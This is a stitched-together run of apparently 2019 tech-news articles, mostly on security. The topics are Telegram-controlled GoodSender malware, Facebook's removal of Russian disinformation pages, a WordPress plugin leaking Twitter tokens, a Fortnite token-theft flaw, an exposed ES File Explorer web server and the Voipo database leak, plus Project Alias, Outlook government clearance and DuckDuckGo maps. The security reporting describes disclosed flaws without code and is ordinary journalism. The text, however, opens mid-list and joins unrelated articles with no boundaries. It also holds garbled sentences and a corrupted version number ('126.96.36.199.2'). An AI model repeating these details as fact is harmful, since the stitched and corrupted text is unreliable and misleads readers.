- arctic.gov — February 25
- inspire2serve.gov — February 26
- usaspending.gov — February 26
- everykidinapark.gov — February 26
- sec.gov — February 26 — the Securities and Exchange Commission
- everytrycounts.gov — February 27
- abandonedmines.gov — February 27
- malwareinvestigator.gov — February 28 — the FBI’s malware analysis site
- va.gov — February 28 — Department of Veterans Affairs
- code.gov — February 28 — Code.gov for Sharing America’s Code
All information was accurate as of January 17.
Sometimes it take a small bug in one thing to find something massive elsewhere.
During an investigation recent, security firm Forcepoint Labs said it found a new kind of malware that was found taking instructions from a hacker sending commands over the encrypted messaging app Telegram .
The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple” Windows-based malware that’s about a year old, which uses Telegram as the method to listen and wait for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as the malware infects, it sends back the username and randomly generated password to the hacker through Telgram.
It’s not the first time malware has used a commercial product to communicate with malware. If it’s over the internet, hackers are hiding commands in pictures posted to Twitter or in comments left on celebrity Instagram posts.
But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.
Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.
End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. The leaking metadata makes it easy to man-in-the-middle the connection and abuse the bots’ API to read bot sent-and-received messages, but also recover the full messaging history of the target bot, the researchers say.
When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.
Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.
“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.
Your bot uncovered, your malware discovered — what can make it worse for the hacker? The researchers know who they are.
Because the hacker didn’t have a clear separation between their development and production workspaces, the researchers say they could track the malware author because they used their own computer and didn’t mask their IP address.
The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.
But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect they used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there is likely more than 120 victims in the U.S., followed by Vietnam, India, and Australia.
Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.
If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.
Two years on from the U.S. presidential election, Facebook continues to have a major problem with Russian disinformation being megaphoned via its social tools.
In a blog post today the company reveals another tranche of Kremlin-linked fake activity — saying it’s removed a total of 471 Facebook pages and accounts, as well as 41 Instagram accounts, which were being used to spread propaganda in regions where Putin’s regime has sharp geopolitical interests.
In its latest reveal of “coordinated inauthentic behavior” — aka the euphemism Facebook uses for disinformation campaigns that rely on its tools to generate a veneer of authenticity and plausibility in order to pump out masses of sharable political propaganda — the company says it identified two operations, both originating in Russia, and both using similar tactics without any apparent direct links between the two networks.
One operation was targeting Ukraine specifically, while the other was active in a number of countries in the Baltics, Central Asia, the Caucasus, and Central and Eastern Europe.
“We’re taking down these Pages and accounts based on their behavior, not the content they post,” writes Facebook’s Nathaniel Gleicher, head of cybersecurity policy. “In these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”Sputnik link
Discussing the Russian disinformation op targeting multiple countries, Gleicher says Facebook found what looked like innocuous or general interest pages to be linked to employees of Kremlin propaganda outlet Sputnik, with some of the pages encouraging protest movements and pushing other Putin lines.
“The Page administrators and account owners primarily represented themselves as independent news Pages or general interest Pages on topics like weather, travel, sports, economics, or politicians in Romania, Latvia, Estonia, Lithuania, Armenia, Azerbaijan, Georgia, Tajikistan, Uzbekistan, Kazakhstan, Moldova, Russia, and Kyrgyzstan,” he writes. “Despite their misrepresentations of their identities, we found that these Pages and accounts were linked to employees of Sputnik, a news agency based in Moscow, and that some of the Pages frequently posted about topics like anti-NATO sentiment, protest movements, and anti-corruption.”
Facebook has included some sample posts from the removed accounts in the blog which show a mixture of imagery being deployed — from a photo of a rock concert, to shots of historic buildings and a snowy scene, to obviously militaristic and political protest imagery.
In all Facebook says it removed 289 Pages and 75 Facebook accounts associated with this Russian disop; adding that around 790,000 accounts followed one or more of the removed Pages.
It also reveals that it received around $135,000 for ads run by the Russian operators (specifying this was paid for in euros, rubles, and U.S. dollars).
“The first ad ran in October 2013, and the most recent ad ran in January 2019,” it notes, adding: “We have not completed a review of the organic content coming from these accounts.”
These Kremlin-linked Pages also hosted around 190 events — with the first scheduled for August 2015, according to Facebook, and the most recent scheduled for January 2019. “Up to 1,200 people expressed interest in at least one of these events. We cannot confirm whether any of these events actually occurred,” it further notes.
Facebook adds that open source reporting and work by partners which investigate disinformation helped identify the network. (For more on the open source investigation check out this blog post from DFRLab.)
It also says it has shared information about the investigation with U.S. law enforcement, the U.S. Congress, other technology companies, and policymakers in impacted countries.Ukraine tip-off
In the case of the Ukraine-targeted Russian disop, Facebook says it removed a total of 107 Facebook Pages, Groups, and accounts, and 41 Instagram accounts, specifying that it was acting on an initial tip off from U.S. law enforcement.
In all it says around 180,000 Facebook accounts were following one or more of the removed pages. While the fake Instagram accounts were being followed by more than 55,000 accounts.
Again Facebook received money from the disinformation purveyors, saying it took in around $25,000 in ad spending on Facebook and Instagram in this case — all paid for in rubles this time — with the first ad running in January 2018, and the most recent in December 2018. (Again it says it has not completed a review of content the accounts were generating.)
“The individuals behind these accounts primarily represented themselves as Ukrainian, and they operated a variety of fake accounts while sharing local Ukrainian news stories on a variety of topics, such as weather, protests, NATO, and health conditions at schools,” writes Gleicher. “We identified some technical overlap with Russia-based activity we saw prior to the US midterm elections, including behavior that shared characteristics with previous Internet Research Agency (IRA) activity.”
In the Ukraine case it says it found no Events being hosted by the pages.
“Our security efforts are ongoing to help us stay a step ahead and uncover this kind of abuse, particularly in light of important political moments and elections in Europe this year,” adds Gleicher. “We are committed to making improvements and building stronger partnerships around the world to more effectively detect and stop this activity.”
A month ago Facebook also revealed it had removed another batch of politically motivated fake accounts. In that case the network behind the pages had been working to spread misinformation in Bangladesh 10 days before the country’s general elections.
This week it also emerged the company is extending some of its nascent election security measures by bringing in requirements for political advertisers to more international markets ahead of major elections in the coming months, such as checks that a political advertiser is located in the country.
However in other countries which also have big votes looming this year Facebook has yet to announced any measures to combat politically charged fakes.
The plugin, Social Network Tabs, was storing so-called account access tokens in the source code of the WordPress website. Anyone who viewed the source code could see the linked Twitter handle and the access tokens. These access tokens keep you logged in to the website on your phone and your computer without having to re-type your password every time or entering your two-factor authentication code.
But if stolen, most sites can’t differentiate between a token used by the account owner, or a hacker who stole the token.
Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the vulnerability and shared details with TechCrunch.
In order to test the bug, Robert found 539 websites using the vulnerable code by searching PublicWWW, a website source code search engine. He then wrote a proof-of-concept script that scraped the publicly available code from the affected websites, collecting access tokens on more than than 400 linked Twitter accounts.
Using the obtained access tokens, Robert tested their permissions by directing those accounts to ‘favorite’ a tweet of his choosing over a hundred times. This confirmed that the exposed account keys had “read/write” access — effectively giving him, or a malicious hacker, complete control over the Twitter accounts.
Among the vulnerable accounts included a couple of verified Twitter users and several accounts with tens of thousands of followers, a Florida sheriff’s office, a casino in Oklahoma, an outdoor music venue in Cincinnati, and more.
Robert told Twitter on December 1 of the vulnerability in the third-part plugin, prompting the social media giant to revoke the keys, rendering the accounts safe again. Twitter also emailed the affected users of the security lapse of the WordPress plugin, but did not comment on the record when reached.
Twitter did its part — what little it could do when the security issue is out of its hands. Any WordPress user still using the plugin should remove it immediately, change their Twitter password, and ensure that the app is removed from Twitter’s connected apps to invalidate the token.
Design Chemical, a Bangkok-based software house that developed the buggy plugin, did not return a request for comment when contacted prior to publication.
On its website, it says the seven-year plugin has been downloaded more than 53,000 times. The plugin, last updated in 2013, still gets dozens of downloads each day.
With one click, any semi-skilled hacker could have silently taken over a Fortnite account, according to a cybersecurity firm who says the bug is now fixed.
Researchers at Check Point say the three vulnerabilities chained together could have affected any of its 200 million players. The flaws, if exploited, would have stolen the account access token set on the gamer’s device once they’ve entered their password.
Once stolen, that token could be used to impersonate the gamer and log in as if they were the account holder, without needing their password.
The researchers say that the flaw lies in how Epic Games, the maker of Fortnite, handles login requests. Researchers said they could send any user a crafted link that appears to come from Epic Games’ own domain and steal an access token needed to break into an account.
“It’s important to remember that the URL is coming from an Epic Games domain, so it’s transparent to the user and any security filter will not suspect anything,” said Oded Vanunu, Check Point’s head of products vulnerability research, in an email to TechCrunch.
Here’s how it works: the user clicks on a link, which points to an epicgames.com subdomain, which the hacker embeds a link to malicious code on their own server by exploiting a cross-site weakness in the subdomain. Once the malicious script loads, unbeknownst to the Fortnite player, it steals their account token and sends it back to the hacker.
“If the victim user is not logged into the game, he or she would have to login first,” said Vanunu. “Once that person is logged in, the account can be stolen.”
Epic Games has since fixed the vulnerability.
“We were made aware of the vulnerabilities and they were soon addressed,” said Nick Chester, a spokesperson for Epic Games. “We thank Check Point for bringing this to our attention.”
“As always, we encourage players to protect their accounts by not re-using passwords and using strong passwords, and not sharing account information with others,” he said.
When asked, Epic Games would not say if user data or accounts were compromised as a result of this vulnerability.
What do you get when you put one Internet connected device on top of another? A little more control than you otherwise would in the case of Alias the “teachable ‘parasite'” — an IoT project smart speaker topper made by two designers, Bjørn Karmann and Tore Knudsen.
The Raspberry Pi-powered, fungus-inspired blob’s mission is to whisper sweet nonsense into Amazon Alexa’s (or Google Home’s) always-on ear so it can’t accidentally snoop on your home.
Alias will only stop feeding noise into its host’s speakers when it hears its own wake command — which can be whatever you like.
The middleman IoT device has its own local neural network, allowing its owner to christen it with a name (or sound) of their choosing via a training interface in a companion app.
The open source TensorFlow library was used for building the name training component.
So instead of having to say “Alexa” or “Ok Google” to talk to a commercial smart speaker — and thus being stuck parroting a big tech brand name in your own home, not to mention being saddled with a device that’s always vulnerable to vocal pranks (and worse: accidental wiretapping) — you get to control what the wake word is, thereby taking back a modicum of control over a natively privacy-hostile technology.
This means you could rename Alexa “Bezosallseeingeye”, or refer to your Google Home as “Carelesswhispers”. Whatever floats your boat.
Once Alias hears its custom wake command it will stop feeding noise into the host speaker — enabling the underlying smart assistant to hear and respond to commands as normal.
“We looked at how cordyceps fungus and viruses can appropriate and control insects to fulfill their own agendas and were inspired to create our own parasite for smart home systems,” explain Karmann and Knudsen in a write up of the project here. “Therefore we started Project Alias to demonstrate how maker-culture can be used to redefine our relationship with smart home technologies, by delegating more power from the designers to the end users of the products.”
Alias offers a glimpse of a richly creative custom future for IoT, as the means of producing custom but still powerful connected technology products becomes more affordable and accessible.
And so also perhaps a partial answer to IoT’s privacy problem, for those who don’t want to abstain entirely. (Albeit, on the security front, more custom and controllable IoT does increase the hackable surface area — so that’s another element to bear in mind; more custom controls for greater privacy does not necessarily mesh with robust device security.)
Project Alias is of course not a solution to the underlying tracking problem of smart assistants — which harvest insights gleaned from voice commands to further flesh out interest profiles of users, including for ad targeting purposes.
That would require either proper privacy regulation or, er, a new kind of software virus that infiltrates the host system and prevents it from accessing user data. And — unlike this creative physical IoT add-on — that kind of tech would not be at all legal.
Why is one of the most popular Android apps running a hidden web server in the background?
ES File Explorer claims it has over 500 million downloads under its belt since 2014, making it one of the most used apps to date. It’s simplicity makes it what it is: a simple file explorer that lets you browse through your Android phone or tablet’s file system for files, data, documents and more.
But behind the scenes, the app is running a slimmed-down web server on the device. In doing so, it opens up the entire Android device to a whole host of attacks — including data theft.
Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the exposed port last week, and disclosed his findings in several tweets on Wednesday. Prior to tweeting, he showed TechCrunch how the exposed port could be used to silently exfiltrate data from the device.
“All connected devices on the local network can get [data] installed on the device,” he said.
Using a simple script he wrote, Robert demonstrated how he could pull pictures, videos, and app names — or even grab a file from the memory card — from another device on the same network. The script even allows an attacker to remotely launch an app on the victim’s device.
He sent over his script for us to test, and we verified his findings using a spare Android phone. Robert said app versions 126.96.36.199.2 and below have the open port.
“It’s clearly not good,” he said.
We contacted the makers of ES File Explorer but did not hear back prior to publication. If that changes, we’ll update.
The obvious caveat is that the chances of exploitation are slim, given that this isn’t an attack that anyone on the internet can perform. Any would-be attacker has to be on the same network as the victim. Typically that would mean the same Wi-Fi network. But that also means that any malicious app on any device on the network that knows how to exploit the vulnerability could pull data from a device running ES File Explorer and send it along to another server, so long as it has network permissions.
Of the reasonable explanations, some have suggested that it’s used to stream video to other apps using the HTTP protocol. Others who historically found the same exposed port found it alarming. The app even says it allows you to “manage files on your phone from your computer… when this feature is enabled.”
But most probably don’t realize that the open port leaves them exposed from the moment that they open the app.
While the DoD is in the process of reviewing the $10 billion JEDI cloud contract RFPs (assuming the work continues during the government shutdown), Microsoft continues to build up its federal government security bona fides, regardless.
Today the company announced it has achieved the highest level of federal government clearance for the Outlook mobile app, allowing US Government Community Cloud (GCC) High and Department of Defense employees to use the mobile app. This is on top of FedRamp compliance, the company achieved last year.
“To meet the high level of government security and compliance requirements, we updated the Outlook mobile architecture so that it establishes a direct connection between the Outlook mobile app and the compliant Exchange Online backend services using a native Microsoft sync technology and removes middle tier services,” the company wrote in a blog post announcing the update.
The update will allows these highly security-conscious employees to access some of the more recent updates to Outlook Mobile such as the ability to add a comment when canceling an event.
This is in line with government security updates the company made last year. While none of these changes are specifically designed to help win the $10 billion JEDI cloud contract, they certainly help make a case for Microsoft from a technology standpoint
As Microsoft corporate vice president for Azure, Julia White stated in a blog post last year, which we covered, “Moving forward, we are simplifying our approach to regulatory compliance for federal agencies, so that our government customers can gain access to innovation more rapidly,” White wrote at the time. The Outlook Mobile release is clearly in line with that.
Today’s announcement comes after the Pentagon announced just last week that it has awarded Microsoft a separate large contract for $1.7 billion. This involves providing Microsoft Enterprise Services for the Department of Defense (DoD), Coast Guard and the intelligence community, according to a statement from DoD.
All of this comes ahead of decision on the massive $10 billion, winner-take-all cloud contract. Final RFPs were submitted in October and the DoD is expected to make a decision in April. The process has not been without controversy with Oracle and IBM submitting a formal protests even before the RFP deadline — and more recently, Oracle filing a lawsuit alleging the contract terms violate federal procurement laws. Oracle has been particularly concerned that the contract was designed to favor Amazon, a point the DoD has repeatedly denied.
An unprotected server storing millions of call logs and text messages was left open for months before they were found by a security researcher.
If you thought you’d heard this story before, you’re not wrong. Back in November, another telecoms company Voxox exposed a database containing millions of text messages — including password resets and two-factor codes.
This time around, it’s a different company: Voipo, a Lake Forest, California communications provider, exposed tens of gigabytes worth of customer data.
Security researcher Justin Paine found the exposed database last week, and reached out to the company’s chief technology officer. Yet, the database was pulled offline before Paine even told him where to look.
Voipo is a voice-over-internet provider, providing residential and business phone line services that they can control themselves in the cloud. The company’s backend routes calls and processes text messages for its users. But because one of the backend ElasticSearch databases wasn’t protected with a password, anyone could look in and see streams of real-time call logs and text messages sent back and forth.
It’s one of the largest data breaches of the year — so far — totaling close to seven million call logs, six million text messages, and other internal documents containing unencrypted passwords that if used could have allowed an attacker to gain deep access to the company’s systems.
TechCrunch reviewed some of the data, and found web addresses in the logs pointed directly to customer login pages. (We didn’t use the credentials as doing so would be unlawful.)
Paine said, and noted in his write-up, that the database was exposed since June 2018, and contains call and message logs dating back to May 2015. He told TechCrunch that the logs were updated daily and went up to January 8 — the day the database was pulled offline. Many of the files contained highly detailed call records of who called whom, the time and date, and more.
Some of the numbers in the call logs were scrubbed, Paine said, but text message logs including the sender and the recipient, and the message itself.
Similar to the Voxox breach last year, Paine said that any intercepted text messages containing two-factor codes or password reset links could have then “allowed the attacker to bypass [two-factor on the user’s account,” he said in his write-up. (Another good reason why you should to upgrade to app-based authentication.)
But Paine didn’t extensively search the records, mindful of customers’ privacy.
The logs also contained credentials that permitted access to Voipo’s provider of E911 services, which allows emergency services to know a person’s pre-registered location based on their phone number. Worse, he said, E911 services could have been disabled, rendering those customers unable to use the service in an emergency.
Another file contained a list of network appliance devices with usernames and passwords in plaintext. A cursory review showed that the files and logs contained a meticulously detailed and invasive insight into a person or company’s business, who they’re talking to and often for what reason.
Yet, none of the data was encrypted.
In an email, Voipo chief executive Timothy Dick confirmed the data exposure, adding that this was “a development server and not part of our production network.” Paine disputes this, given the specifics and scale of the data exposed.
TechCrunch also has no reason to believe that the data is not real customer data.
Dick told TechCrunch: “Almost immediately after he reached out to let us know the dev server was exposed, we took it offline and investigated and corrected the issue.” He added: “At this time though, we have not found any evidence in logs or on our network to indicate that a data breach occurred.”
Despite asking several times, Dick did not say how the company concluded that nobody else accessed the data.
Dick also said: “All of our systems are behind firewalls and similar and don’t even allow external connections except from internal servers so even if hostnames were listed, it would not be possible to connect and our logs do not show any connections.” (When we checked, many of the internal systems with IP or web addresses we checked loaded — even though we were outside of the alleged firewall.)
However, in an email to Paine, Dick conceded that some of the data on the server “does appear to be valid.”
Dick didn’t commit to notify the authorities of the exposure under state data breach notification laws.
“We will continue to investigate and if we do find any evidence of a breach or anything in our logs that indicate one, we will of course take appropriate actions to address it [and] make notifications,” he said.
DuckDuckGo has a new, unlikely partner in search: Apple.
The privacy-focused search engine that promises to never track its users said Tuesday it’s now using data provided by Apple Maps to power its map-based search results. Although DuckDuckGo had provided limited mapping results for a while using data from open-source service OpenStreetMap, it never scaled its features to those of its search engine rivals, notably Google and Bing.
Now, DuckDuckGo will return addresses, businesses, geographical locations, and nearby places using Apple Maps by default. (When we tested, directions and transit times open up in Apple Maps on your Mac, iPhone, or iPad — but on non-Apple devices, the directions defaults to and opens in Bing.)
In using Apple’s mapping data, DuckDuckGo will become one of the biggest users of Apple Maps to date, six months after Apple said it would open up Apple Maps, long only available on Macs, iPhones and iPads, to the web.
“We’re excited to work closely with Apple to set a new standard of trust online, and we hope you’ll enjoy this update,” said the search engine in a blog post.
In reality, the partnership isn’t that unsurprising at all.
Apple faced flak for ditching Google Maps in iOS and rushing its overhauled Maps service out to the market, prompting a rare mea culpa from chief executive Tim Cook, apologizing for the disastrous rollout. At its most recent Worldwide Developers Conference in June, Apple promised a do-over, offering reliability and stability — but more importantly, privacy.
Where Google tracks everything you do, where you go and what you search for, Apple has long said it doesn’t want to know. Any data that Apple collects is anonymous, said Eddy Cue, Apple internet software and services chief, in an interview with TechCrunch last year. “We specifically don’t collect data, even from point A to point B,” said Cue. By anonymizing the data, Apple doesn’t know where you came from or where you went, or even who took the trip.
DuckDuckGo finally brings a much-needed feature to the search engine, while keeping true to its privacy-focused roots as a non-tracking search rival to Google.
“You are still anonymous when you perform map and address-related searches on DuckDuckGo,” the search engine said.
In a separate note, DuckDuckGo said users can turn on their location for better “nearby” search results, but promises to not store the data or use it for any purposes. “Even if you opt-in to sharing a more accurate location, your searches will still be completely anonymous,” said DuckDuckGo.
“We do not send any personally identifiable information such as IP address to Apple or other third parties,” the company said.
DuckDuckGo processes 30 million daily searches, up by more than 50 percent year-over-year, the company said last year.